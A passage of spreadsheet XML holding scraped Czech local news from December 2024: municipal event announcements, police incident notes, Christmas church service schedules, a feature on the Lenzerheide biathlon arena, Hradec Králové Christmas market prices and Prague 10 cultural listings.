s několika zastaveními. Začátek v 19:00 ve skautské klubovně v Hájku, cíl tamtéž. NEDĚLE 5. LEDEN 16:00 TŘI KRÁLOVÉ A NOVOROČNÍ OHŇOSTROJ Náměstí Míru Nový rok bude ve znamení oslav, nových příležitostí, radosti, ale také ohňostroje v centru města na náměstí Míru. Těšit se můžete na kulturní program, který bude zakončen novoročním přípitkem se slavnostním ohňostrojem. SOBOTA 25. LEDEN 19:00 REPREZENTAČNÍ PLES MĚSTA Kulturní dům, ZUŠ, Kafé v kině Město Veselí nad Moravou vás srdečně zve na tradiční Reprezentační ples, který se uskuteční 25. ledna 2025 od 19:00 hodin. Připravte se na společenský večer plný hudby a zábavy. V průběhu večera se otevřou hned tři sály. Ať už dáváte přednost valčíkům, folkloru nebo moderním rytmům, u nás si každý najde to své. Zaznějí nezapomenutelné melodie v podání Prestige Symphony Orchestra a Big Band ZUŠ Veselí nad Moravou . Chybět nebude ani CM Radošov a DH Šohajé, kteří vás zavedou do světa slováckých lidových písní a tanců. Předprodej vstupenek bude zahájen 10. prosince. Od 9:00 začíná fyzický předprodej v Turistickém informačním centru na Panském dvoře (náměstí Míru 664). Online prodej bude spuštěn od 12:00 na webu kultura-veseli.cz.</t>
  </si>
  <si>
    <t>20241201_377_3473481661_7b238b12778ac7ab6b63.html</t>
  </si>
  <si>
    <t>7b238b12778ac7ab6b63</t>
  </si>
  <si>
    <t>Střípky městské policie</t>
  </si>
  <si>
    <t>Shrnutí Střípky městské policie Kluziště na „Branžováku“ • 16. 10. ve 13.45 nám občan hlásil, že se vozovka v ulici P. Jilemnického proměnila v kluziště – zřejmě kvůli úniku oleje z nějakého auta. Strážníci okamžitě vyrazili po „horké“ olejové stopě, která začínala na Kostelecké ulici a vedla až ke kruhové křižovatce na Průmyslové. Tam objevili podezřelou dodávku a jejího řidiče. Ten sdělil, že si úniku oleje všiml až na Zápské, a tak zavolal hasiče. Naštěstí druhá hlídka potvrdila, že hasiči už sypou sorbent jako o závod. Další řešení jsme tedy nechali na nich. Myčka na chodníku • 27. 10. v 7.40 objevila hlídka městské policie na chodníku v ulici Výletní odloženou nefunkční myčku na nádobí. Svědek uvedl, že spotřebič vyložil neznámý řidič, popsal přesně i podobu vozidla. Na základě těchto informací policie v okolí dohledala provozovatele vozidla a identifikovala řidiče, který se přiznal, že myčku ráno na chodník skutečně vyložil. Uvedl, že ji někdo neznámý umístil na korbu jeho vozu, což ho rozladilo, a tak myčku z vozidla odložil. Hlídka věc řešila domluvou, s tím, že řidič poté spotřebič odvezl na sběrný dvůr za přítomnosti hlídky. Ne mrtvý, ale ožralý • 1. 11. ve 12.40 objevila hlídka městské policie v Hluchově částečně zapadlé vozidlo s řidičem bez známek života. Po probuzení a kontrole zdravotního stavu byl muž zmatený a silně zapáchal po alkoholu . Dechová zkouška prokázala 2,87 ‰. Řidič se při kontrole pokoušel opakovaně startovat vozidlo a odjet. Proto mu hlídka odebrala klíče a na místo byla přivolána Policie ČR, která si věc převzala jako podezření ze spáchání přečinu ohrožení pod vlivem návykové látky. Rvačka u restaurace zaměstnala IZS • 9. 11. v 00.30 asistovala MP na žádost Policie ČR u potyčky u restaurace, kde se mělo prát asi osm osob. Na místo dorazily i dvě hlídky, kterým strážníci asistovali při šetření události, do příjezdu zdravotnické záchranné služby . Na pokyn Policie ČR provedla hlídka také kontrolu okolí, kde hledala osobu, která z místa utekla. Pátrání po osobě odpovídající popisu však byla negativní. Věc nadále šetří Policie ČR. Autor: (raf) Autor person raf</t>
  </si>
  <si>
    <t>20241201_378_3473474244_133b70e17b1074743889.html</t>
  </si>
  <si>
    <t>133b70e17b1074743889</t>
  </si>
  <si>
    <t>Vánoční bohoslužby</t>
  </si>
  <si>
    <t>Shrnutí Vánoční bohoslužby • Římskokatolická farnost u kostela sv. Jakuba St . v Praze 13 – Stodůlkách V KOSTELE SV. JAKUBA ST. Úterý 24. 12. – Štědrý den • 17.00 hod. – mše sv. – Vigilie Slavnosti Narození Páně • 24.00 hod. – mše sv. – Vigilie Slavnosti Narození Páně Středa 25. 12. – Boží hod vánoční • 8.00 hod.– mše sv. – Slavnost Narození Páně Čtvrtek 26. 12. – Svátek sv. Štěpána • 9.30 hod. – mše sv. Pátek 27. 12. – Svátek sv. Jana • 18.00 hod. - mše sv. s žehnáním vína Sobota 28. 12. – Svátek mláďátek betlémských • 18.00 hod. – mše sv. Neděle 29. 12. – Svátek svaté rodiny • 8.00 hod. – mše sv. s poděkováním za naše rodiny • 18.00 hod. – mše sv. s poděkováním za naše rodiny Úterý 31. 12. – Te Deum za uplynulý rok • 17.00 hod. – mše sv. Středa 1. 1. 2025 – Slavnost Matky Boží, Panny Marie • 9.30 a 18.00 hod. – mše sv. .................................................................. V KOSTELE SV. PROKOPA V KOMUNITNÍM CENTRU, V HŮRKÁCH 8 Úterý 24. 12. – Štědrý den • 15.00 hod. – mše sv. – Vigilie Slavnosti Narození Páně (pro rodiny s dětmi) • 22.00 hod. – mše sv. – Vigilie Slavnosti Narození Páně Středa 25. 12. – Boží hod vánoční • 9.30 hod. – mše sv. – Slavnost Narození Páně (pro rodiny s dětmi) • 11.00 hod. – mše sv. – Slavnost Narození Páně Čtvrtek 26. 12. – Svátek sv. Štěpána • 11.00 hod. – mše sv. Neděle 29. 12. – Svátek svaté rodiny • 9.30 hod. – mše sv. pro rodiny s dětmi • 11.00 hod. – mše sv. s poděkováním za naše rodiny Středa 1. 1. 2025 – Slavnost Matky Boží, Panny Marie • 11.00 hod. – mše sv. .................................................................. • Řeckokatolický chrám sv. Kříže a sv. Heleny ( Stodůlky - Háje, při železniční trati nad Bílým Beránkem, zastávka autobusu č. 225) Vánoční bohoslužby v chrámu sv. Kříže a sv. Heleny v Praze – Stodůlkách , Ukrajinské řeckokatolické církve Neděle 15. 12. 9.00 hod. – Neděle svatých praotců – v ukrajinštině Neděle 22. 12. 9.00 hod. – Neděle svatých otců – ve staroslověnštině Středa 25. 12. 9.00 hod. – Narození našeho Pána Ježíše Krista – ve staroslověnštině Neděle 29. 12. 9.00 hod. – Neděle po Narození našeho Pána Ježíše Krista – v ukrajinštině Dále bohoslužby každou neděli od 9.00 v sudý týden v ukrajinštině a v lichý týden ve staroslověnštině. Kněz o. Leo Salvet, tel. 601 209 050, kaple.sv.krize@seznam.cz .................................................................. Sbor církve bratrské v Praze 13 Třináctka - Křesťanské centrum (Obchodní centrum Luka, Mukařovského 1986, 1. patro) Neděle 29. 12. – Poslední bohoslužba v roce 2024 10.00 hod.</t>
  </si>
  <si>
    <t>20241201_379_3473463365_6d844401881ad20cdf38.html</t>
  </si>
  <si>
    <t>6d844401881ad20cdf38</t>
  </si>
  <si>
    <t>Za svahů zní: Tady je Federerovo</t>
  </si>
  <si>
    <t>Shrnutí Za svahů zní: Tady je Federerovo Nový biatlonový areál, kde se bude konat světový š ampionát, se otevřel připravený. A byli jsme u toho Z nadupané klasiky v Novém Městě na Moravě se biatlonové MS tentokrát přesune do nového území. Únorový šampionát se chystá ve švýcarském Lenzerheide jako zhmotněný sen úspěšného podnikatele Michaela Hartwega, který zdejší areál vybudoval na zelené louce. A blízko bydlí Roger Federer . „Jednáme s jeho managementem,“ usmíval se na téma jeho účasti na MS šéf organizátorů Jürg Capol během semináře Forum Nordicum. Postavil se na střechu servisní budovy, na jejímž průčelí je napsáno Roland Arena. Jürg Capol měl právě za zády mobilní tribuny hlavního stadionu biatlonového areálu v Lenzerheide , kde už se pomalu kupily kupky umělého sněhu. „Trať je hodně otevřená. V létě se na ní pasou krávy. Prostoru je dost. Jde spíš o logistický problém, jak sem diváky dostat,“ líčil. „Abychom naplnili rozpočet, potřebujeme padesát pět tisíc lidí. Ale doufáme, že jich přijde víc.“ Minulou zimu biatlonová rodina šílela euforií v Novém Městě na Moravě , kam během MS dorazilo přes 210 000 fandů a Johannes Thingnes Bö se jim po posledním závodě uctivě uklonil. Tradiční mekku vystřídá v nadcházející zimě nové místo na závodní mapě. V Lenzerheide vznikla aréna před jedenácti lety a teprve vloni v prosinci se v ní poprvé uskutečnil závod Světového poháru. Za vším stojí vášeň německého podnikatele Michaela Hartwega, otce současného švýcarského reprezentanta Niklase Hartwega, juniorského mistra světa z roku 2019. „Poprvé jsem se s ním potkal před dvanácti lety a vyprávěl mi o svém projektu. Říkal jsem, že ho čeká dlouhá cesta. Ale líbilo se mi to,“ vzpomíná Capol. „Jednou za čas jsem ho viděl a vždycky přišel s novou informací, s novým nápadem, jak by měl stadion vypadat. Investoval do toho deset milionů švýcarských franků. A v tu chvíli to nedělal pro Niklase, byl ještě mladý, nemohl vědět, jak se jeho kariéra bude vyvíjet.“ Hartweg je původem triatlonista, na závodech se potkal i se svojí manželkou. Biatlon si zamiloval z podobných důvodů jako miliony dalších fanoušků, v televizi se díval s celou rodinou a bavilo ho napětí na střelnici, kde se může osud závodu během pár momentů úplně změnit. „ Švýcarsko je biatlonový národ, jenom o tom ještě neví,“ vypálil Hartweg povedený bonmot pro server NZZ během loňského úvodního závodu SP v Lenezerheide. K němu vedla dlouhá cesta. V nové aréně se nejprve konaly závody běžkařské Tour de Ski, v nichž exceloval místní hrdina Dario Cologna . Populární seriál před dvěma desetiletími spolu s legendárním Vegardem Ulvangem vymyslel Capol, který v okolí Lenzerheide vyrůstal. Hartwegovi přišel na pomoc poté, co středisko ve Švýcarských Alpách získalo pořadatelství biatlonového MS už pro rok 2025. „Dva roky se ztratily diskuzemi a pak jsem dostal nabídku. Řekl jsem si: Bude to legrace,“ usmívá se Capol. „Neměli jsme organizační výbor, který by měl za sebou deset Světových pohárů, museli jsme spoustu věcí změnit. Nebylo to tak, že bychom jen po milimetru brousili hotové dřevo. Sekali jsme stromy.“ Česká linka Capolův příběh má výraznou linku i k Česku. Kdysi sem přivedl Tour de Ski, která se v nejslavnějších dobách Lukáše Bauera jela i na Pražském hradě. Našel si tu lásku, založil rodinu a sedm let žil kousek od Říčan . „Na děti jsem ale mluvil německy, česky umím špatně. Není to jednouchý jazyk. Do jisté míry rozumím, můžu si objednat pivo a koupit rohlík…“ směje se Capol, přičemž během výpovědi v angličtině vyslovil název pekařského výrobku česky. Koncem října už v Lenzerheide zbývá jen uklidit třísky. Na stadionu jsou připraveny mobilní tribuny pro 7500 lidí. V rohu areálu hučí umělé zasněžování, odkud pracovníci navážejí sníh po dosud zeleném okolí. Na místo pravidelně jezdí tréninkové skupiny sportovců, kteří bydlí v pokojících uvnitř budovy Nordic House . Jsou pojmenované podle slavných biatlonistů a jeden z nich je věnován í české legendě Ondřeji Moravcovi. Aréna je ale otevřená i veřejnosti. Můžete si zaplatit i kurz střílení z biatlonové malorážky. Ceny? Jsme ve Švýcarsku , takže 35 švýcarských franků pro děti a 99 švýcarských franků pro dospělé. Sníh pomalu přikryje závodní tratě, které jsou poměrně náročné s táhlými stoupáními. To nejprudší se jmenuje Hartweg Hill, symbolicky podle mecenáše i jeho pasujícím příjmením – v překladu těžká cesta. Problémy násobí i vysoká nadmořská výška. Stadion leží v 1393 metrech nad mořem a nejbližší horský masiv, který se tyčí na dohled, se často schovává v mracích. Další stoupání se jmenuje podle švýcarské biatlonistky Amy Basergaové. Populární sestry Gasparinovy připomíná reklamní poutač v místní restauraci, kde z fotky všechny tři nabízí preclíky sponzorské firmy Roland, a taky pasáž tratě s názvem Gasparin Dream. Tady je Rogerovo V okolí ale občas pobývá ještě slavnější sportovec. Tenisová ikona Roger Federer si vybudoval prázdninovou multigenerační haciendu v nedaleké vesničce Valbella. Na přibližně 8000 metrech čtverečních v oblasti Graubünden vystavěl pohodlné sídlo v ceně 17,5 milionu dolarů. Je to ale jen jeden z domů, které vlastní po celém světě. „Není v Lenzerheide pořád. Na instagramu je vidět, že je pořád někde v Tokiu , Šanhgaji, New Yorku …“ smál se nedávný běžkařský hrdina Dario Cologna . „Je to skvělý kluk. Lyžovat jsme spolu ještě nebyli, několikrát jsem ho potkal na oficiálních akcích. Je populární, nejenom kvůli výsledkům v tenisu, ale i svojí osobností. I pro mě je vzor.“ Federer lyžuje rád. V současnosti ve švýcarských televizích běží reklama, kde účinkuje spolu s Marcem Odermattem. „Minulou zimu postoval i videa, jak lyžuje. Žije kousek od Lenzerheide , takže lyžuje i tady,“ říká Diego Züger, obchodní ředitel švýcarského lyžařského svazu. Před rokem se Federer v Lenzerheide ukázal při premiéře biatlonového SP. „A sportovci si s ním dělali selfie,“ usmívá se Capol. „Jestli přijede i na mistrovství světa, ještě nevíme, ale jednáme o tom s jeho managementem.“ FOTO SPORT: MARTIN HAŠEK , VÍT CHALUPA, PROFIMEDIA.CZ Autor: Martin Hašek Autor Martin Hašek</t>
  </si>
  <si>
    <t>20241201_38_3478674859_bc47d0c6f161de41821d.html</t>
  </si>
  <si>
    <t>bc47d0c6f161de41821d</t>
  </si>
  <si>
    <t>Vánoční trhy v Hradci Králové otevřely. Svařák od 50 korun, ruské kolo za stovku</t>
  </si>
  <si>
    <t>Vánoční trhy v Hradci Králové otevřely. Svařák od 50 korun, ruské kolo za stovku Nové stánky, atrakce pro děti, gastrozóna a nová výzdoba. Letos se hradecké trhy zcela proměnily. „Moc se nám to líbí. Dneska sice není moc hezky, ale i tak je to mnohem hezčí než v minulých letech,“ říká paní Pavla, která vyrazila na otevření trhů hned v neděli večer s manželem a dvěma malými dětmi. Hradecko „Docela se mi líbí i ten sortiment ve stáncích, k vánočním trhům se to hodí, neviděl jsem tady žádné, snad kromě jedné výjimky, čínské, blikající hračky, takže děti po nás nechtějí nesmysly,“ dodává se smíchem manžel paní Pavly Karel. Nové dřevěné stánky nabízejí vesměs to, co byste od vánočních trhů čekali. Od vánočních ozdob, jmelí, přes svíčky, kožené výrobky, pletené zboží jako jsou rukavice, čepice či ponožky, drobné šperky, ale i vykrajovátka na cukroví, nebo dřevěné hračky a domácí potřeby. Svařák nejčastěji za 60 korun Bez svařáku by to nešlo a jinak to není ani na vánočních trzích na Velkém náměstí v Hradci Králové . Nejčastěji nabízí prodejci 0,2 litru svařeného vína za 60 korun. U dvou stánků ale pořídíte vánoční klasiku už 50 korun. Jedním jsou Horké nápoje od Toníka, druhým pak Svařené nápoje ze Španělska . Tady také můžete za stejnou cenu ochutnat svařenou sangrii. Svařené víno ale může na hradeckých trzích stát i 89 korun. Nevídané, horký mošt za 26 Horké nealko v podobě dvou deci ohřátého hroznového moštu stojí kolem 50 korun. Příjemným překvapením je ale stánek poblíž ústí ulice V Kopečku, kde nabízejí totéž množství jablečného moštu s rakytníkem za pouhou polovinu. Hradecko Uprostřed trhů naproti pódiu pak najdete i gastrozónu, kde se najíte pěkně vsedě u stolu a pocit tepla minimálně symbolicky dodávají plynové ohříváky. Tady mají točené pivo od 50 korun, 40 zaplatíte za půllitr malinovky, gulášová polévka stojí 75, bramborák se zelným salátem 56 a langoš se vším pak 138 korun. Stánek hned vedle už langoš „se vším“ nabízí za 110 korun a zmíněný bramborák může stát i 40 korun, je ale potřeba hledat. Opodál si dáte za rozumné peníze i pečenou klobásu a mnohé další. Vánoční vesnička v Hradci Králové už svítí. | Video: Deník/Michaela Horynová Velkému náměstí vévodí 15 metrů vysoké ruské kolo. Za svezení na něm zaplatíte 100 korun, dětský kolotoč opodál pak stojí 80 Kč. Samozřejmě nechybí ani farmářská ulička s regionálními, oceněnými produkty. Ta ale bude obsazená jen o pátku do neděle. Autor: Jiří Fremuth Autor Jiří Fremuth</t>
  </si>
  <si>
    <t>11860</t>
  </si>
  <si>
    <t>5790</t>
  </si>
  <si>
    <t>20241201_380_3473481503_bba6adf04f524b2feaa2.html</t>
  </si>
  <si>
    <t>bba6adf04f524b2feaa2</t>
  </si>
  <si>
    <t>Náš advent a Vánoce</t>
  </si>
  <si>
    <t>Shrnutí Náš advent a Vánoce Listopad odpočítává své dny a před námi je posledních 31 dní roku 2024. Říká se, že poslední dva měsíce roku jsou hektičtější než obvykle. Možná to v našem dvojměstí platí dvojnásobně, protože musíme spěch a vánoční přípravy zvládnout v obou jeho částech. Nešlo by přeci jen na chvíli zvolnit, zastavit se a vychutnat kouzlo Vánoc i adventu? Pojďme si vánoční přípravy užít v klidu a pohodě, a především beze spěchu, tak nějak po brandýsku a boleslavsku, protože město má co nabídnout a možná o tom ani nevíte. Jak tedy na klidný advent a pohodové Vánoce v Polabí ? Adventně se vám bude dobře rozjímat třeba při nostalgických procházkách po labských březích, v Houštce, v Panské nebo okolních boleslavských lesích. Vaše kroky mohou zamířit i do boleslavských kostelů, kde si můžete vychutnat nádherný zvuk zvonů nebo si něco slíbit u Palladia země české. Pokud se týče Staré Boleslavi , nezapomeňte na betlém ve staroboleslavských ambitech a bráně. Skvělé dárky se dají nakoupit v informačním centru, radost udělá třeba staroboleslavské svatováclavské pivo nebo průvodcovský bedekr centra české státnosti od Petra Kukala , který nabízí vinotéka U Kostela. Zde lze nakoupit skvělé vánoční balíčky nejen s vinným podtextem. Radost z dárků můžete oslavit skvělou kávou v Adélčině kavárně nebo obdobném zařízení naproti. Letošní novinkou jsou adventní trhy na Mariánském náměstí. Otevřeny budu každý den, tak běžte stánkaře podpořit. Budete-li si chtít užít Vánoce na pravém labském břehu, nezapomeňte na brandýský zámek. Především výstavu o medových Vánocích byste si neměli nechat ujít, jde o krásné souznění Vánoc, renesančního zámku a tajemna. V posledním týdnu vás město chce překvapit vánoční vesničkou, kde si můžete dokonale vychutnat kouzlo Vánoc v brandýském podání. Nemusíte jezdit do Prahy , Drážďan či Norimberku , stačí vzít pár přátel a přijít na brandýské náměstí, kde najdete všechno, co se od Vánoc očekává. Zvolněte, neblázněte a když koupíte o jeden dárek méně, svět se nezboří. Za rok budou Vánoce znovu. Petr Čeněk Autor: Petr Čeněk zastupitel za Naše dvojměstí Autor person Petr Čeněk</t>
  </si>
  <si>
    <t>20241201_381_3488643023_881c29c7cb3330b56dba.html</t>
  </si>
  <si>
    <t>881c29c7cb3330b56dba</t>
  </si>
  <si>
    <t>Vánoční doba</t>
  </si>
  <si>
    <t>Shrnutí Vánoční doba Rubrika: Spolky | Koncerty Vážení a milí čtenáři Chaberského zpravodaje, čas od času lze zaslechnout od televizních moderátorů v závěru relace 26. prosince výrok ve stylu: „Tak nám skončily vánoční svátky.“ Pokud by tomu tak opravdu bylo, moc bychom si vánočního veselí neužili. Dovolte tedy malé okénko týkající se liturgického kalendáře a lidových i náboženských zvyků spojených s vánoční dobou. Její začátek je jasně daný Slavností Narození Páně 25. 12. , která se podle prastarého židovsko-křesťanského zvyku začíná slavit již v předvečer svátečního dne, jelikož podle starobylého semitského obyčeje den začíná již předchozí večer východem první hvězdy, nikoli až o půlnoci, jak to máme v současnosti. Takovéto večerní nebo noční bohoslužby předcházející velkým svátkům se nazývají vigilie (od latinského vigilare, bdít) neboli noční bdění, jelikož právě toto je jejich hlavní náplní: bdít na modlitbách. V našem zeměpisném prostoru je velmi populární tzv. půlnoční mše, která pro mnohé rodiny představuje povinnou porci vánoční romantiky hned po štědrovečerní pohádce. Z praktických důvodů, obzvláště kvůli zvýšené koncentraci opilců a lidí chovajících se v kostelech nevhodným způsobem, se v mnohých farnostech slaví spíše vigilie např. od 22 h. namísto klasické půlnoční, byť rozdíl je jen v používaných bohoslužebných textech a času konání, nikoli v podstatě, kterou je oslava narození Spasitele. K samotnému Štědrému večeru i Božímu hodu vánočnímu patří nepřeberné množství lidových zvyků, které by vydalo na samostatné pojednání. Rád bych zmínil zpívání koled, živé betlémy nebo vánoční hry, v nichž herci ztvárňují biblické příběhy, o kterých se čte v liturgii. Předávání darů je pak odkazem na ten největší dar, jenž lidstvu Bůh dal ve svém Synu Ježíši Kristu . Prosincové dny, které bezprostředně následují, jsou prastarými oslavami svátků významných svatých, jež díky jejich popularitě „nepřebil“ ani tzv. vánoční oktáv, tedy osmidenní oslavování narození Jezulátka. Latinsky se těmto světcům říkalo comites Christi, družina Kristova. Jako první sem patří prvomučedník sv. Štěpán (26. 12.), o jehož svátku se tradičně koledovalo a večer pak konala taneční zábava. Následuje svátek sv. Jana 27. 12. , který je zase spojen s žehnáním vína , jelikož nepřátelé chtěli tohoto evangelistu otrávit vínem , nicméně on nad číší udělal znamení kříže a jed mu neuškodil. Poté 28. 12. si připomínáme Betlémská Mláďátka, tedy malé chlapce, které nařídil zabít krutý Herodes v domnění, že tak zlikviduje i narozeného Ježíše. Dalším důležitým datem je 6. leden, kdy se slaví Epifanie neboli Zjevení Páně, lidově Tři králové. Teprve o neděli po 6. lednu končí doba vánoční svátkem Křtu Páně, kdy si připomínáme Ježíšův křest v řece Jordánu , kterým byly její vody posvěceny a Kristus hned poté začal své veřejné působení. Kostel bude otevřen k modlitbě a tiché prohlídce: 25. 12. , 26. 12. a 31. 12. a 1. 1. mezi 13:00 a 16:00 hod. Vánoční bohoslužby: 24. 12. od 16:00 hod., 1. 1. od 16:00 hod., 5. 1. od 16:00 hod. Autor: P. Petr Havlík Autor person Petr Havlík Rubrika transition_slide Spolky | Koncerty</t>
  </si>
  <si>
    <t>20241201_382_3484765507_3c99156194a6c22c2b0a.html</t>
  </si>
  <si>
    <t>3c99156194a6c22c2b0a</t>
  </si>
  <si>
    <t>Kulturní servis VRŠOVICKÉ DIVADLO MANA Moskevská 967/34, www.vrsovickedivadlo.cz 1/12 15.00 Slyšel jsem sovu zavolat své jméno 2/12 19.30 Návod na přežití 5/12 15.00 Mikuláš v MANĚ 5/12 18.00 Mikuláš v MANĚ 6/12 19.30 Čapek 7/12 19.30 Ve dvě na Kodaňské 20% sleva 9/12 19.30 To nemyslíš vážně, Pavlíčku 10/12 19.30 Máma říkala, že bych neměla + kvíz 11/12 19.30 M*A*S*H derniéra 12/12 19.30 kabaret Smutná neděle 14/12 19.30 Zahraj to znovu, Same 15/12 15.00 Ptáci, zvířata a moji příbuzní 16/12 19.30 Kohoutovy aktovky 17/12 19.30 Otevřená zpovědnice poslední uvedení 18/12 19.30 Lajf 19/12 19.30 Návod na přežití 20/12 10.00 Temno pro školy a seniory 27/12 19.30 Zahraj to znovu, Same 29/12 19.30 Matka 31/12 17.00 5 za 1 + welcome drink VZLET Holandská 669/1, www.vzlet.cz 1/12 15.00 Divadlo U staré herečky : Radujme se, veselme se! 1/12 16.00–18.00 Výroba adventních věnců 2/12 Vernisáž Vzletfoto 3/12 15.00 Křest knihy: Pohybovník 4/12 17.30 Vernisáž výstavy: Vršovická Biografie 4/12 19.30 První rána kapitána diskuze s tvůrci po představení 5/12 16.30–18.30 První rána kapitána 5/12 19.30 Mikulášská nadílka ve Vzletu 5/12 19.30 První rána kapitána + diskuze s tvůrci po představení 7/12 19.00 Talent drama studio: Já + Kočky v plastu 8/12 17.00 Vánoční koncert pro děti: Na andělských strunách harfy 9/12 19.30 Vosto5: PROTON !!! od 10/12 Josef Váchal / Miloš Šejn – Vyvolané obrazy 11+12/12 18.30–22.00 Maraton psaní dopisů 11/12 19.30 Petr Lébl / Daniela Špinar: Objal mě bůh a nic dramaturgický úvod od 19.00 12/12 10.00 Petr Lébl / Daniela Špinar: Objal mě bůh a nic 12/12 19.30 Petr Lébl / Daniela Špinar: Objal mě bůh a nic 15/12 15.00 Literární Vzlet: Jiří Stránský – Povídačky pro Klárku pro děti od 6 let 15/12 19.30 Vosto5: Kupé ve Vzletu #32 19/12 19.30 Collegium 1704 uvádí: Justin Kangmin Kim &amp;amp; Collegium 1704 koncert STRAŠNICKÉ DIVADLO Solidarity 53, www.strasnicke-divadlo.cz 1/12 19.00 František Plánička – Fotbalový rytíř 3/12 13.00 František Plánička – Fotbalový rytíř zadáno pro školy 3/12 19.00 František Plánička – Fotbalový rytíř 6/12 16.00 Mikulášská a pomikulášská akce 7/12 15.00 Presidenti 12/12 19.00 Premiéra premiéra 14/12 19.00 Sladké plody reality 15/12 15.00 Vystoupení žáků ZUŠ Olešská 17/12 13.30 František Plánička – Fotbalový rytíř zadáno pro školy 17/12 19.00 František Plánička – Fotbalový rytíř 18/12 9.00-10.30 Trapas nepřežiju 18/12 19.00 Dáma České republiky 2024 19/12 17.00 Vánoční akademie studentů Gymnázia Omská 21/12 19.00 Stará láska nerezaví 29/12 19.00 Silvestr naruby aneb Letušky už navždy odlétají derniéra s přípitkem a občerstvením KULTURNÍ DŮM BARIKÁDNÍKŮ Saratovská 3420/2a, www.kdbarikadniku.cz 1/12 14.00 Taneční orchestr St. Douši 2/12 19.00 Tomáš Průša band + Nezmaři koncert 3/12 19.00 Žlutá žába pluje do Mongolska přednáška Dana Přibáně 4/12 15.00 Filatelistické výměnné středisko 4/12 19.00 Country taneční 6/12 19.00 Rock‘n‘roll na Barče 7/12 10.00 Vinylová a CD burza 8/12 14.00 Hvězdný prach 9/12 20.00 Harlej koncert 10/12 18.00 Pražští heligonkáři 11/12 15.00 Filatelistické výměnné středisko 11/12 19.00 Country bál 13/12 19.00 Nové struny + Taxmeni koncert 14/12 19.00 Řecký večer s Marthou a Tenou Elefteriadu 15/12 14.00 Taurus taneční odpoledne 16/12 18.00 Rockové Vánoce na Barče 17/12 18.00 J.J. Big Band vánoční swingový taneční večer 18/12 19.00 AG Flek koncert 19/12 19.00 KTO vánoční koncert 20/12 19.00 Pocta Zuzaně Navarové 27/12 18.00 Pražští heligonkáři 29/12 14.00 Hvězdný prach BR DIVADLO Úvalská 28, www.brdivadlo.cz Hodinu před každým představením otevřen loutkokoutek – vyrobte si vlastní loutku. 1/12 17.17 Mikulášská s Vilíkem 8/12 15.15 Vilík a čarodějnice 14/12 10.10 Popletli jsme pohádku popředu i pozpátku! TRMALOVA VILA Vilová 91/11, www.trmalovavila.eu Rezervace místa na akcích: tel. 775 234 343 nebo e-mail produkce@foibos.cz. Prohlídky Trmalovy vily i výstav na objednávku: produkce@foibos.cz nebo tel. 775 234 343, další informace o akcích naleznete na Facebooku. výstavy Jan Kotěra – učitel bydlení 16/10 – 1/12 Přišli spolu 4/12 18.00 Adam a Eva vernisáž kreseb žáků ZUŠ 18/12 14.00 XXV. salon Kotěry KINO PILOTŮ Donská 168/19, www.kinopilotu.cz prosincové premiéry: od 2/12 Andy Warhol – americký sen od 5/12 Čarodějky Zvířátka a Vánoce Pán prstenů: Válka Rohirů Pro smilování! Echt – Film o malíři Janu Metovi Bob a Bobek ve filmu: Na stopě Mrkvojeda 11/12 19.00 Sex slavnostní premiéra od 12/12 Aznavour 19/12 Mufasa: Lví král 22/12 Ježek Sonic 3 předpremiéra 26/12 Saint-Exupéry Ježek Sonic 3 Better Man kino seniorů: 2/12 15.30 Anora 2/12 16.00 Výjimečný stav 9/12 15.30 Konkláve 9/12 16.00 Presidentka 16/12 15.30 Lee: Fotografka v první linii 16/12 16.00 Vlny 23/12 16.00 Válečný zpravodaj 30. 12. kino seniorů není. Seniorské projekce jsou za zvýhodněné vstupné 75 Kč. VLC WALDES Moskevská 262/57, www.vlcwaldes.cz 4/12 18.30 Bohémané 7/12 10.00 Vánoční čtení a kreativní dílna pro malé děti 9/12 18.00 Vernisáž fotografií Svazu českých fotografů 10/12 18.30 Jiří Winter NEPRAKTA PROSTOR OLGA Nad Primaskou 821/1, bubahof.com do 31/12 Výstava otevřené umělecké skupiny Björnsonova „You Will Lose Your Mind“ 9/12, 11/12 a 12/12 18.00–20.00 Transfer kolektiv – Stávat se telenovelou III 10/12 17.00–19.00 V rytmu věnců a jehličí tvořivé setkání Otevřeno středy a čtvrtky od 14 do 18 hodin DIVADLO MIRIAM Ke Strašnické 10, www.divadlomaj.cz 1/12 15.00 Hrnečku vař aneb Dvě pohádky pro mlsné jazýčky 4/12 19.00 Za gaučem 8/12 15.00 Hračky 15/12 15.00 Sluncomrak PROSTOR PRÁDELNA Dvouletky 43/30, Praha 10 www.sidlistesolidarita.cz 14/12 13.00–18.00 Zimní SWAP speciál / dárky a dekorace 15/12 Sousedská vánočka vol. 8 GALERIE PRE Na Hroudě 1492/4, www.gejzir.eu/galerie-pre do 13/12 Ještě ses nenarodil výstava obrazů Mike Koppëho MĚSTSKÁ KNIHOVNA V PRAZE www.mlp.cz POBOČKA DŮM ČTENÍ Ruská 192/1455, Praha 10 4/12 18.00 Vánoce našich babiček 18/12 18.00 Klub inspirativních děl: Homérova Ílias, 24. zpěv zdravotní seminář POBOČKA SKALKA Rubensova 2237/2 5/12 17.00 Vánoční koncert sborů Větrník, Větrníček a Větrák POBOČKA KORUNNÍ Korunní 2160/68, Praha 10 7/12 10.00 Divadlo KAKÁ: Rychlé šípy pro děti od 3 let 13/12 a 14/12 Adventní knižní swap 18/12 12.00–19.00 Placka pod vánoční stromeček MILÍČOVA KAPLE Rektorská 715/54 www.facebook.com/milicovakaple 1/12 17.00 Koncert barokní hudby loutková pohádka 8/12 17.00 V tebe doufáme koncert židovských a ukrajinských písní 15/12 17.00 Adventní rozjímání, Musica ad tabulam 21/12 19.00 Punkový koncert 22/12 17.00 Vánoční prozpěvování 24/12 23.00 Štědrovečerní bohoslužba KATOLICKÁ FARNOST VRŠOVICE sál za kostelem sv. Václava , náměstí Svatopluka Čecha 12/12 19.00 Martin Loučka : Dobrý konec, všechno dobré AKCE PRO RODINY S DĚTMI ČTYŘLÍSTEK DĚTEM, Z. S. K Učilišti 50/13, 102 00 Praha 10 www.ctyrlistekdetem.cz radka.sindlerova@ctyrlistekdetem.cz 4/12, 11/12, 18/12 10.00–11.30 Klub pro rodiče a děti 4/12 16.00–18.00 Svépomocná skupina pro rodiče dětí s vývojovou dysfázií RODINNÉ A KOMUNITNÍ CENTRUM JABLÍČKOV, Z. S. Počernická 524/64, Praha 10 – Malešice www.jablickov.cz / info@jablickov.cz / tel.: 734 703 201 7/12 odpoledne Mikulášská nadílka 8/12 odpoledne Korálková dílna – výroba vánočních ozdob 15/12 16.30 Workshop Bezpečí na internetu pro žáky 5.–9. tříd 21/12 dopoledne Vánoční výlet za zvířátky do Klánovic 